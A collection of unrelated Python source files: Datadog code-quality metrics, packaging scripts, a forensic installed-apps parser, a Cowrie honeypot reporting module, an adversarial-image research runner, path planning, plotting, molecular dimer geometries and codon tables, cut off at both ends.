api_key = os.environ.get("DATADOG_API_KEY")
app_key = os.environ.get("DATADOG_APP_KEY")
assert api_key and app_key, "DATADOG_API_KEY and DATADOG_APP_KEY must both be set"
datadog.initialize(api_key=api_key, app_key=app_key)
self.metrics = []
def log(self, metric, value, tags=None):
self.stdout.write(f"{metric}: {value} {tags or ''}")
if self.datadog:
self.metrics.append({
'metric': metric,
'points': value,
'type': "gauge",
'host': "travis-ci.org",
'tags': [
"environment:travis",
f"travis_build:{os.environ.get('TRAVIS_BUILD_ID')}",
f"travis_number:{os.environ.get('TRAVIS_BUILD_NUMBER')}",
f"travis_job_number:{os.environ.get('TRAVIS_JOB_NUMBER')}",
] + (tags or []),
})
def send_all(self):
if self.datadog:
datadog.api.Metric.send(self.metrics)
self.metrics = []
class Command(BaseCommand):
help = ("Display a variety of code-quality metrics. This is run on every travis "
"build, but only submitted to datadog during the daily cron job.")
def handle(self, **options):
self.stdout.write("----------> Begin Static Analysis <----------")
self.logger = DatadogLogger(self.stdout)
self.show_couch_model_count()
self.show_custom_modules()
self.show_js_dependencies()
self.show_toggles()
self.show_complexity()
self.logger.send_all()
self.stdout.write("----------> End Static Analysis <----------")
def show_couch_model_count(self):
def all_subclasses(cls):
return set(cls.__subclasses__()).union([
s for c in cls.__subclasses__() for s in all_subclasses(c)
])
model_count = len(all_subclasses(Document))
self.logger.log("commcare.static_analysis.couch_model_count", model_count)
def show_custom_modules(self):
custom_module_count = len(set(settings.DOMAIN_MODULE_MAP.values()))
custom_domain_count = len(settings.DOMAIN_MODULE_MAP)
self.logger.log("commcare.static_analysis.custom_module_count", custom_module_count)
self.logger.log("commcare.static_analysis.custom_domain_count", custom_domain_count)
def show_js_dependencies(self):
proc = subprocess.Popen(["./scripts/codechecks/hqDefine.sh", "static-analysis"], stdout=subprocess.PIPE)
output = proc.communicate()[0].strip().decode("utf-8")
(step1, step2, step3) = output.split(" ")
self.logger.log("commcare.static_analysis.hqdefine_file_count", int(step1), tags=[
'status:unmigrated',
])
self.logger.log("commcare.static_analysis.hqdefine_file_count", int(step2), tags=[
'status:hqdefine_only',
])
self.logger.log("commcare.static_analysis.requirejs_file_count", int(step3), tags=[
'status:migrated',
])
def show_toggles(self):
counts = Counter(t.tag.name for t in all_toggles() + all_previews())
for tag, count in counts.items():
self.logger.log("commcare.static_analysis.toggle_count", count, [f"toggle_tag:{tag}"])
def show_complexity(self):
# We can use `--json` for more granularity, but it doesn't provide a summary
output = subprocess.run([
"radon", "cc", ".",
"--min=C",
"--total-average",
"--exclude=node_modules/*,staticfiles/*",
], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
raw_blocks, raw_complexity = output.split('\n')[-2:]
blocks_pattern = r'^(\d+) blocks \(classes, functions, methods\) analyzed.$'
blocks = int(re.match(blocks_pattern, raw_blocks).group(1))
self.logger.log("commcare.static_analysis.code_blocks", blocks)
complexity_pattern = r'^Average complexity: A \(([\d.]+)\)$'
complexity = round(float(re.match(complexity_pattern, raw_complexity).group(1)), 3)
self.logger.log("commcare.static_analysis.avg_complexity", complexity)
for grade in ["C", "D", "E", "F"]:
count = len(re.findall(f" - {grade}\n", output))
self.logger.log(
"commcare.static_analysis.complex_block_count",
count,
tags=[f"complexity_grade:{grade}"],
)
|
38689
|
from setuptools import setup, find_packages
from setuptools.command.test import test
from distutils.util import convert_path
# We can't import the submodule normally as that would "run" the main module
# code while the setup script is meant to *build* the module.
# Besides preventing a whole possible mess of issues with an un-built package,
# this also prevents the vapoursynth import which breaks the docs on RTD.
# convert_path is used here because according to the distutils docs:
# '...filenames in the setup script are always supplied in Unix
# style, and have to be converted to the local convention before we can
# actually use them in the filesystem.'
meta = {}
exec(open(convert_path('vsutil/_metadata.py')).read(), meta)
class DiscoverTest(test):
def finalize_options(self):
test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import os
import unittest
path = os.path.join(os.path.dirname(__file__), "tests")
runner = unittest.TextTestRunner(verbosity=2)
suite = unittest.TestLoader().discover(path, pattern="test_*.py")
runner.run(suite)
setup(
name='vsutil',
version=meta['__version__'],
packages=find_packages(exclude=['tests']),
package_data={
'vsutil': ['py.typed']
},
url='https://encode.moe/vsutil',
license='MIT',
author=meta['__author__'].split()[0],
author_email=meta['__author__'].split()[1][1:-1],
description='A collection of general-purpose Vapoursynth functions to be reused in modules and scripts.',
install_requires=[
"vapoursynth"
],
cmdclass={
'test': DiscoverTest
},
python_requires='>=3.8',
project_urls={
'Documentation': 'http://vsutil.encode.moe/en/latest/',
'Source': 'https://github.com/Irrational-Encoding-Wizardry/vsutil',
'Tracker': 'https://github.com/Irrational-Encoding-Wizardry/vsutil/issues',
},
keywords='encoding vapoursynth video',
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Topic :: Multimedia :: Video",
"Typing :: Typed",
],
)
|
38715
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
class DirectoryAccessGroup(models.Model):
"""
Grants expiring group access to the personnel directory.
"""
organization = models.ForeignKey('core.Organization', on_delete=models.CASCADE)
group = models.ForeignKey('auth.Group', on_delete=models.CASCADE)
active_from = models.DateTimeField(blank=True, null=True)
active_until = models.DateTimeField(blank=True, null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = _('directory access group')
verbose_name_plural = _('directory access groups')
ordering = ('organization', 'group')
|
38720
|
import sqlite3
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, open_sqlite_db_readonly
def get_installedappsGass(files_found, report_folder, seeker, wrap_text):
for file_found in files_found:
file_found = str(file_found)
if file_found.endswith('.db'):
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
distinct(package_name)
FROM
app_info
''')
if 'user' in file_found:
usernum = file_found.split("/")
usernum = '_'+str(usernum[-4])
else:
usernum = ''
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Installed Apps')
report.start_artifact_report(report_folder, f'Installed Apps (GMS){usernum}')
report.add_script()
data_headers = ('Bundle ID',) # Don't remove the comma, that is required to make this a tuple as there is only 1 element
data_list = []
for row in all_rows:
data_list.append((row[0],))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'installed apps - GMS{usernum}'
tsv(report_folder, data_headers, data_list, tsvname)
else:
            logfunc(f'No Installed Apps data available{usernum}')
db.close()
|
38802
|
import pytest
from django.core import mail
from test_fixtures.users import user
from .utils import send_activation_email, send_password_reset_email
@pytest.mark.django_db
def test_send_activation_email(user, rf):
request = rf.request()
send_activation_email(user, request)
assert len(mail.outbox) == 1
@pytest.mark.django_db
def test_send_password_reset_email(user, rf):
request = rf.request()
send_password_reset_email(user, request)
assert len(mail.outbox) == 1
|
38812
|
from setuptools import setup, find_packages
REQUIRES = [
'Flask>=1.1.1',
'Flask-SocketIO>=4.2.1',
'Flask-Login>=0.4.1',
'requests>=2.22.0',
'pytz>=2019.2',
'paho-mqtt>=1.4.0',
'RPi.GPIO>=0.7.0',
]
setup(
name='AlarmPI',
version='4.7',
description='Home Security System',
author='bkbilly',
author_email='<EMAIL>',
packages=find_packages(),
install_requires=REQUIRES,
# long_description=open('README.md').read()
)
|
38834
|
import numpy as np
import networkx as nx
from commons import *
from tqdm import tqdm
def apply_rrt(state_space, starting_state, target_space, obstacle_map, granularity=0.1, d_threshold=0.5,
n_samples=1000, find_optimal=True):
tree = nx.DiGraph()
tree.add_node(starting_state)
final_state = None
min_cost = None
for i in tqdm(range(n_samples)):
# select node to expand
m_g, random_point = select_node_to_expand(tree, state_space)
# sample a new point
m_new = sample_new_point(m_g, random_point, d_threshold)
# check if m_new lies in space_region
if not lies_in_area(m_new, state_space):
continue
# check if path between(m_g,m_new) defined by motion-model is collision free
if not is_collision_free(m_g, m_new, obstacle_map, granularity):
continue
# if path is free, add new node to tree
tree.add_weighted_edges_from([(m_g, m_new, cartesian_distance(m_g, m_new))])
if lies_in_area(m_new, target_space):
if final_state is None:
final_state = m_new
min_cost = nx.dijkstra_path_length(tree, starting_state, m_new)
if not find_optimal:
break
else:
# if new final state has shorter cost, set it as final state
cost = nx.dijkstra_path_length(tree, starting_state, m_new)
if cost < min_cost:
final_state = m_new
min_cost = cost
if final_state is None:
print("Target not reached.")
return tree, final_state
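# Usage sketch (illustrative; the formats of state_space, target_space and obstacle_map are
# defined by the accompanying commons module, so only the call shape is shown here):
#   tree, goal = apply_rrt(state_space, starting_state, target_space, obstacle_map,
#                          n_samples=2000, find_optimal=False)
#   if goal is not None:
#       path = nx.dijkstra_path(tree, starting_state, goal)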
|
38848
|
import argparse
from attacks.image_save_runner import ImageSaveAttackRunner
from attacks.selective_universal import SelectiveUniversal
from dataset import Dataset
from models import create_ensemble
from models.model_configs import config_from_string
parser = argparse.ArgumentParser(description='Defence')
parser.add_argument('--input_dir', metavar='DIR',
help='Input directory with images.')
parser.add_argument('--output_dir', metavar='FILE',
help='Output directory to save images.')
parser.add_argument('--max_epsilon', type=int, default=16, metavar='N',
help='Maximum size of adversarial perturbation. (default: 16.0)')
parser.add_argument('--npy_files', nargs='+', type=str)
parser.add_argument('--ensemble', nargs='+', help='Class names for the defensive ensemble.')
parser.add_argument('--ensemble_weights', nargs='+', type=float,
help='Weights for weighted geometric mean of output probs')
parser.add_argument('--checkpoint_paths', nargs='+', help='Paths to checkpoint files for each model.')
parser.add_argument('--try_mirrors', action='store_true', default=False)
def main():
args = parser.parse_args()
dataset = Dataset(args.input_dir, target_file='')
cfgs = [config_from_string(s) for s in args.ensemble]
target_model = create_ensemble(cfgs, args.ensemble_weights, args.checkpoint_paths).cuda()
target_model.eval()
attack = SelectiveUniversal(
target_model,
args.npy_files,
max_epsilon=args.max_epsilon,
try_mirrors = args.try_mirrors
)
runner = ImageSaveAttackRunner(dataset, args.output_dir)
# Only supports batch size of 1
runner.run(attack, 1)
if __name__ == '__main__':
main()
|
38850
|
from google.appengine.ext import ndb
CACHE_DATA = {}
def get(cache_key):
full_cache_key = '{}:{}'.format(cache_key, ndb.get_context().__hash__())
return CACHE_DATA.get(full_cache_key, None)
def set(cache_key, value):
full_cache_key = '{}:{}'.format(cache_key, ndb.get_context().__hash__())
CACHE_DATA[full_cache_key] = value
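# Usage sketch (illustrative): values are memoized per ndb context, so entries written in
# one request context are not visible from another.
#   set('team_listing', listing)   # 'team_listing' is just an example key
#   cached = get('team_listing')   # None on a miss or under a different ndb context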
|
38867
|
import os
import sys
from gradslam.config import CfgNode as CN
cfg = CN()
cfg.TRAIN = CN()
cfg.TRAIN.HYPERPARAM_1 = 0.9
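# Usage sketch: importing this module yields a nested, attribute-style config, e.g.
#   from config import cfg   # assuming this file is importable as `config`
#   print(cfg.TRAIN.HYPERPARAM_1)  # 0.9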
|
38879
|
import setuptools
with open("README.md", "r") as f:
long_description = f.read()
setuptools.setup(
name="django-osm-field",
author="<NAME>",
author_email="<EMAIL>",
description="Django OpenStreetMap Field",
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/MarkusH/django-osm-field",
project_urls={
"CI": "https://github.com/MarkusH/django-osm-field/actions", # noqa
"Changelog": "https://github.com/MarkusH/django-osm-field/blob/main/CHANGELOG.md", # noqa
"Issues": "https://github.com/MarkusH/django-osm-field/issues", # noqa
},
packages=setuptools.find_packages(
exclude=[
"*.example",
"*.example.*",
"example.*",
"example",
"*.tests",
"*.tests.*",
"tests.*",
"tests",
],
),
include_package_data=True,
install_requires=["Django>=2.2"],
extras_require={
"dev": ["pre-commit"],
"docs": [
"Django",
"sphinx_rtd_theme",
"Sphinx>=3.0,<3.4",
],
"test": [
"coverage[toml]>=5,<6",
"Django",
],
},
    setup_requires=["setuptools_scm>=5,<6"],
use_scm_version=True,
keywords="OpenStreetMap, OSM, Django, Geo, Geoposition",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Framework :: Django",
"Framework :: Django :: 2.2",
"Framework :: Django :: 3.0",
"Framework :: Django :: 3.1",
"Framework :: Django :: 3.2",
"Framework :: Django :: 4.0",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
],
python_requires=">=3.5",
)
|
38890
|
import numpy
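# Reads "N M" from stdin and prints numpy.eye(N, M); the replace() calls prepend a space to
# every element so the output matches the judge's legacy numpy formatting (this looks like a
# HackerRank "Eye and Identity" solution).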
print(str(numpy.eye(*map(int,input().split()))).replace('1',' 1').replace('0',' 0'))
|
38919
|
import os
import uuid
import pytest # type: ignore
from hopeit.testing.apps import execute_event
from hopeit.server.version import APPS_API_VERSION
from model import Something
from simple_example.collector.collect_spawn import ItemsInfo, ItemsCollected
APP_VERSION = APPS_API_VERSION.replace('.', "x")
@pytest.fixture
def sample_file_ids():
ids = [str(uuid.uuid4()), str(uuid.uuid4())]
for test_id in ids:
json_str = '{"id": "' + test_id + '", "user": {"id": "u1", "name": "test_user"}, ' \
+ '"status": {"ts": "2020-05-01T00:00:00Z", "type": "NEW"}, "history": []}'
os.makedirs(f'/tmp/simple_example.{APP_VERSION}.fs.data_path/', exist_ok=True)
with open(f'/tmp/simple_example.{APP_VERSION}.fs.data_path/{test_id}.json', 'w') as f:
f.write(json_str)
f.flush()
return ids
@pytest.mark.asyncio
async def test_find_two_items(app_config, sample_file_ids): # noqa: F811
payload = ItemsInfo(*sample_file_ids)
result, pp_result, response = await execute_event(app_config=app_config,
event_name='collector.collect_spawn',
payload=payload,
postprocess=True)
assert isinstance(result, list)
assert len(result) == 2
assert result[0].id == sample_file_ids[0]
assert result[1].id == sample_file_ids[1]
assert pp_result == 2
@pytest.mark.asyncio
async def test_find_one_item(app_config, sample_file_ids): # noqa: F811
payload = ItemsInfo(sample_file_ids[0], str(uuid.uuid4()))
result, pp_result, response = await execute_event(app_config=app_config,
event_name='collector.collect_spawn',
payload=payload,
postprocess=True)
assert isinstance(result, Something)
assert result.id == sample_file_ids[0]
assert pp_result == 1
@pytest.mark.asyncio
async def test_find_no_items(app_config, sample_file_ids): # noqa: F811
payload = ItemsInfo(str(uuid.uuid4()), str(uuid.uuid4()))
result, pp_result, response = await execute_event(app_config=app_config,
event_name='collector.collect_spawn',
payload=payload,
postprocess=True)
assert result == ItemsCollected([])
assert pp_result == 0
|
38997
|
from __future__ import annotations
import os
from datetime import datetime
from twisted.python import log
import cowrie.core.output
from cowrie.core.config import CowrieConfig
token = CowrieConfig.get("output_csirtg", "token", fallback="<PASSWORD>")
if token == "<PASSWORD>":
log.msg("output_csirtg: token not found in configuration file")
exit(1)
os.environ["CSIRTG_TOKEN"] = token
import csirtgsdk # noqa: E402
class Output(cowrie.core.output.Output):
"""
CSIRTG output
"""
def start(self):
"""
Start the output module.
        Note that csirtgsdk is imported at module level only after CSIRTG_TOKEN is set,
        because it reads that environment variable on import; Cowrie sets it above.
"""
self.user = CowrieConfig.get("output_csirtg", "username")
self.feed = CowrieConfig.get("output_csirtg", "feed")
self.debug = CowrieConfig.getboolean("output_csirtg", "debug", fallback=False)
self.description = CowrieConfig.get("output_csirtg", "description")
self.context = {}
# self.client = csirtgsdk.client.Client()
def stop(self):
pass
def write(self, e):
"""
Only pass on connection events
"""
if e["eventid"] == "cowrie.session.connect":
self.submitIp(e)
def submitIp(self, e):
peerIP = e["src_ip"]
ts = e["timestamp"]
system = e.get("system", None)
if system not in [
"cowrie.ssh.factory.CowrieSSHFactory",
"cowrie.telnet.transport.HoneyPotTelnetFactory",
]:
return
today = str(datetime.now().date())
if not self.context.get(today):
self.context = {}
self.context[today] = set()
key = ",".join([peerIP, system])
if key in self.context[today]:
return
self.context[today].add(key)
tags = "scanner,ssh"
port = 22
if e["system"] == "cowrie.telnet.transport.HoneyPotTelnetFactory":
tags = "scanner,telnet"
port = 23
i = {
"user": self.user,
"feed": self.feed,
"indicator": peerIP,
"portlist": port,
"protocol": "tcp",
"tags": tags,
"firsttime": ts,
"lasttime": ts,
"description": self.description,
}
if self.debug is True:
log.msg(f"output_csirtg: Submitting {i!r} to CSIRTG")
ind = csirtgsdk.indicator.Indicator(i).submit()
if self.debug is True:
log.msg(f"output_csirtg: Submitted {ind!r} to CSIRTG")
log.msg("output_csirtg: submitted to csirtg at {} ".format(ind["location"]))
|
38999
|
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
fn = sys.argv[1]
pal = sns.color_palette()
with open(fn) as f:
toPlot = []
names = []
goodness = []
xs = []
ys = []
ps = []
sns.set()
for line in f:
tokens = line.split(' ')
if len(tokens) == 1:
numBins = int(tokens[0])
for i in range(0, numBins):
toPlot.append([])
xs.append([])
ys.append([])
ps.append([])
names.append('')
goodness.append(0)
else:
binId = int(tokens[0])
plotNum = int(tokens[1])
val = int(tokens[2])
xs[plotNum].append(int(tokens[4]))
ys[plotNum].append(int(tokens[5]))
ps[plotNum].append(int(tokens[6]))
toPlot[plotNum].append(val)
names[plotNum] = str(binId)
goodness[plotNum] = int(tokens[3])
for i in range(0, len(toPlot)):
clr = pal[2]
#sns.distplot(toPlot[i], kde=False, bins = 50, color=clr)
#plt.title('bin ' + names[i])
#plt.savefig('figures/binHist' + str(i+1) + '.png')
#plt.cla()
#plt.clf()
#plt.close()
sns.lineplot(x=xs[i], y=ys[i], color = pal[0])
sns.lineplot(x=xs[i], y=ps[i], color = clr)
plt.title('bin ' + names[i])
plt.savefig('figures/binScatter' + str(i+1) + '.png')
plt.cla()
plt.clf()
plt.close()
|
39014
|
import os
import unittest
import invirtualenv.contextmanager
class TestContextmanager(unittest.TestCase):
def test__revert_file(self):
with invirtualenv.contextmanager.InTemporaryDirectory():
with open('testfile', 'w') as fh:
fh.write('original')
self.assertEqual('original', open('testfile').read())
with invirtualenv.contextmanager.revert_file('testfile'):
with open('testfile', 'w') as fh:
fh.write('changed')
self.assertEqual('changed', open('testfile').read())
self.assertEqual('original', open('testfile').read())
def test__InTemporaryDir(self):
with invirtualenv.contextmanager.InTemporaryDirectory() as tempdir:
self.assertIsInstance(tempdir, str)
self.assertTrue(os.path.exists(tempdir))
|
39025
|
from pyqchem.structure import Structure
import numpy as np
# Ethene parallel position
def dimer_ethene(distance, slide_y, slide_z):
coordinates = [[0.0000000, 0.0000000, 0.6660120],
[0.0000000, 0.0000000, -0.6660120],
[0.0000000, 0.9228100, 1.2279200],
[0.0000000, -0.9228100, 1.2279200],
[0.0000000, -0.9228100, -1.2279200],
[0.0000000, 0.9228100, -1.2279200],
[distance, 0.0000000, 0.6660120],
[distance, 0.0000000, -0.6660120],
[distance, 0.9228100, 1.2279200],
[distance, -0.9228100, 1.2279200],
[distance, -0.9228100, -1.2279200],
[distance, 0.9228100, -1.2279200]]
coordinates = np.array(coordinates)
coordinates[6:, 1] = coordinates[6:, 1] + slide_y
coordinates[6:, 2] = coordinates[6:, 2] + slide_z
symbols = ['C', 'C', 'H', 'H', 'H', 'H', 'C', 'C', 'H', 'H', 'H', 'H']
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': 6}
# Tetrafluoroethene
def dimer_tetrafluoroethene(distance, slide_y, slide_z):
monomer = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer)
#monomer2 = np.dot(monomer, rotation_matrix([0, 1, 0], np.pi / 2))
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer, monomer2])
molecule = Structure(coordinates=coordinates,
symbols=symbols * 2,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': len(monomer)}
# Mixed ethene / tetrafluoroethene dimer
def dimer_mix(distance, slide_y, slide_z):
monomer1 = [[ 0.6660120, 0.0000000, 0.0000000,],
[-0.6660120, 0.0000000, 0.0000000,],
[ 1.2279200, 0.9228100, 0.0000000,],
[ 1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, 0.9228100, 0.0000000,]]
symbols1 = ['C', 'C', 'H', 'H', 'H', 'H']
monomer2 = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols2 = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer2)
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer1, monomer2])
symbols = symbols1 + symbols2
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.4,
'n_mon': len(monomer1)}
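if __name__ == '__main__':
    # Minimal sketch (not part of the original file): build the parallel ethene dimer with a
    # 4 Angstrom separation; the second return value carries options consumed downstream.
    molecule, options = dimer_ethene(4.0, 0.0, 0.0)
    print(options)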
|
39065
|
import cv2
def webcam_gui(filter_func, video_src=0):
    cap = cv2.VideoCapture(video_src)
    # cap the capture rate at roughly 10 fps (CAP_PROP_FPS must be set on an instance)
    cap.set(cv2.CAP_PROP_FPS, 10)
key_code = -1
while(key_code == -1):
# read a frame
ret, frame = cap.read()
# run filter with the arguments
frame_out = filter_func(frame)
# show the image
cv2.imshow('Press any key to exit', frame_out)
# wait for the key
key_code = cv2.waitKey(10)
cap.release()
cv2.destroyAllWindows()
def edge_filter(frame_in):
# convert into gray scale
frame_gray = cv2.cvtColor(frame_in, cv2.COLOR_BGR2GRAY)
# blur the image to reduce noise
frame_blur = cv2.blur(frame_gray, (3,3))
# Canny edge detection
frame_out = cv2.Canny(frame_blur, 30, 120)
return frame_out
def gray_filter(frame_in):
# convert into gray scale
frame_out = cv2.cvtColor(frame_in, cv2.COLOR_BGR2GRAY)
return frame_out
if __name__ == "__main__":
    webcam_gui(edge_filter)
|
39069
|
import ast
import os
from mr_proper.public_api import is_function_pure
from mr_proper.utils.ast import get_ast_tree
def test_ok_for_destructive_assignment():
funcdef = ast.parse("""
def foo(a):
b, c = a
return b * c
""".strip()).body[0]
assert is_function_pure(funcdef)
def test_is_function_pure_fail_case():
funcdef = ast.parse("""
def foo(a):
print(a)
""".strip()).body[0]
assert not is_function_pure(funcdef)
def test_is_function_pure_fail_case_for_recursive():
test_file_path = os.path.join(os.path.dirname(__file__), 'test_files/test.py')
ast_tree = get_ast_tree(test_file_path)
foo_node = ast_tree.body[0]
assert not is_function_pure(
foo_node,
file_ast_tree=ast_tree,
pyfilepath=test_file_path,
recursive=True,
)
|
39083
|
from typing import Dict, Any
from allenact.algorithms.onpolicy_sync.losses import PPO
from allenact.algorithms.onpolicy_sync.losses.ppo import PPOConfig
from allenact.utils.experiment_utils import LinearDecay, PipelineStage
from baseline_configs.one_phase.one_phase_rgb_base import (
OnePhaseRGBBaseExperimentConfig,
)
class OnePhaseRGBPPOExperimentConfig(OnePhaseRGBBaseExperimentConfig):
USE_RESNET_CNN = False
@classmethod
def tag(cls) -> str:
return "OnePhaseRGBPPO"
@classmethod
def num_train_processes(cls) -> int:
return 40
@classmethod
def _training_pipeline_info(cls, **kwargs) -> Dict[str, Any]:
"""Define how the model trains."""
training_steps = cls.TRAINING_STEPS
return dict(
named_losses=dict(
ppo_loss=PPO(clip_decay=LinearDecay(training_steps), **PPOConfig)
),
pipeline_stages=[
PipelineStage(loss_names=["ppo_loss"], max_stage_steps=training_steps,)
],
num_steps=64,
num_mini_batch=1,
update_repeats=3,
use_lr_decay=True,
lr=3e-4,
)
|
39095
|
import numpy as np
class SequenceTools(object):
dna2gray_ = {'c': (0, 0), 't': (1, 0), 'g': (1, 1), 'a': (0, 1)}
gray2dna_ = {(0, 0): 'c', (1, 0): 't', (1, 1): 'g', (0, 1): 'a'}
codon2protein_ = {'ttt': 'f', 'ttc': 'f', 'tta': 'l', 'ttg': 'l', 'tct': 's', 'tcc': 's', 'tca': 's',
'tcg': 's', 'tat': 'y', 'tac': 'y', 'taa': '!', 'tag': '!', 'tgt': 'c', 'tgc': 'c',
'tga': '!', 'tgg': 'w', 'ctt': 'l', 'ctc': 'l', 'cta': 'l', 'ctg': 'l', 'cct': 'p',
'ccc': 'p', 'cca': 'p', 'ccg': 'p', 'cat': 'h', 'cac': 'h', 'caa': 'q', 'cag': 'q',
'cgt': 'r', 'cgc': 'r', 'cga': 'r', 'cgg': 'r', 'att': 'i', 'atc': 'i', 'ata': 'i',
'atg': 'm', 'act': 't', 'acc': 't', 'aca': 't', 'acg': 't', 'aat': 'n', 'aac': 'n',
'aaa': 'k', 'aag': 'k', 'agt': 's', 'agc': 's', 'aga': 'r', 'agg': 'r', 'gtt': 'v',
'gtc': 'v', 'gta': 'v', 'gtg': 'v', 'gct': 'a', 'gcc': 'a', 'gca': 'a', 'gcg': 'a',
'gat': 'd', 'gac': 'd', 'gaa': 'e', 'gag': 'e', 'ggt': 'g', 'ggc': 'g', 'gga': 'g',
'ggg': 'g'}
protein2codon_ = {
'l': ['tta', 'ttg', 'ctt', 'ctc', 'cta', 'ctg'],
's': ['tct', 'tcc', 'tca', 'tcg', 'agt', 'agc'],
'r': ['cgt', 'cgc', 'cga', 'cgg', 'aga', 'agg'],
'v': ['gtt', 'gtc', 'gta', 'gtg'],
'a': ['gct', 'gcc', 'gca', 'gcg'],
'p': ['cct', 'ccc', 'cca', 'ccg'],
't': ['act', 'acc', 'aca', 'acg'],
'g': ['ggt', 'ggc', 'gga', 'ggg'],
'stop': ['taa', 'tag', 'tga'],
'i': ['att', 'atc', 'ata'],
'y': ['tat', 'tac'],
'f': ['ttt', 'ttc'],
'c': ['tgt', 'tgc'],
'h': ['cat', 'cac'],
'q': ['caa', 'cag'],
'n': ['aat', 'aac'],
'k': ['aaa', 'aag'],
'd': ['gat', 'gac'],
'e': ['gaa', 'gag'],
'w': ['tgg'],
'm': ['atg']
}
protein2constraint_ = {
'l': {(1,): {('t',)}, (0, 2): {('t', 'a'), ('t', 'g'), ('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g')}},
's': {(0, 1, 2): {('t', 'c', 't'), ('t', 'c', 'c'), ('t', 'c', 'a'), ('t', 'c', 'g'), ('a', 'g', 't'),
('a', 'g', 'c')}},
'r': {(1,): {('g',)}, (0, 2): {('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g'), ('a', 'a'), ('a', 'g')}},
'v': {(0,): {('g',)}, (1,): {('t',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'a': {(0,): {('g',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'p': {(0,): {('c',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
't': {(0,): {('a',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'g': {(0,): {('g',)}, (1,): {('g',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'stop': {(0,): {('t',)}, (1, 2): {('a', 'a'), ('a', 'g'), ('g', 'a')}},
'i': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('t',), ('a',), ('c',)}},
'y': {(0,): {('t',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'f': {(0,): {('t',)}, (1,): {('t',)}, (2,): {('t',), ('c',)}},
'c': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('t',), ('c',)}},
'h': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'q': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'n': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'k': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'd': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'e': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'w': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('g',)}},
'm': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('g',)}},
}
# Integer mapping from Fernandes and Vinga (2016)
codon2idx_ = {'aaa': 1, 'aac': 2, 'aag': 3, 'aat': 4, 'aca': 5, 'acc': 6, 'acg': 7, 'act': 8, 'aga': 9,
'agc': 10, 'agg': 11, 'agt': 12, 'ata': 13, 'atc': 14, 'atg': 15, 'att': 16, 'caa': 17,
'cac': 18, 'cag': 19, 'cat': 20, 'cca': 21, 'ccc': 22, 'ccg': 23, 'cct': 24, 'cga': 25,
'cgc': 26, 'cgg': 27, 'cgt': 28, 'cta': 29, 'ctc': 30, 'ctg': 31, 'ctt': 32, 'gaa': 33,
'gac': 34, 'gag': 35, 'gat': 36, 'gca': 37, 'gcc': 38, 'gcg': 39, 'gct': 40, 'gga': 41,
'ggc': 42, 'ggg': 43, 'ggt': 44, 'gta': 45, 'gtc': 46, 'gtg': 47, 'gtt': 48, 'taa': 49,
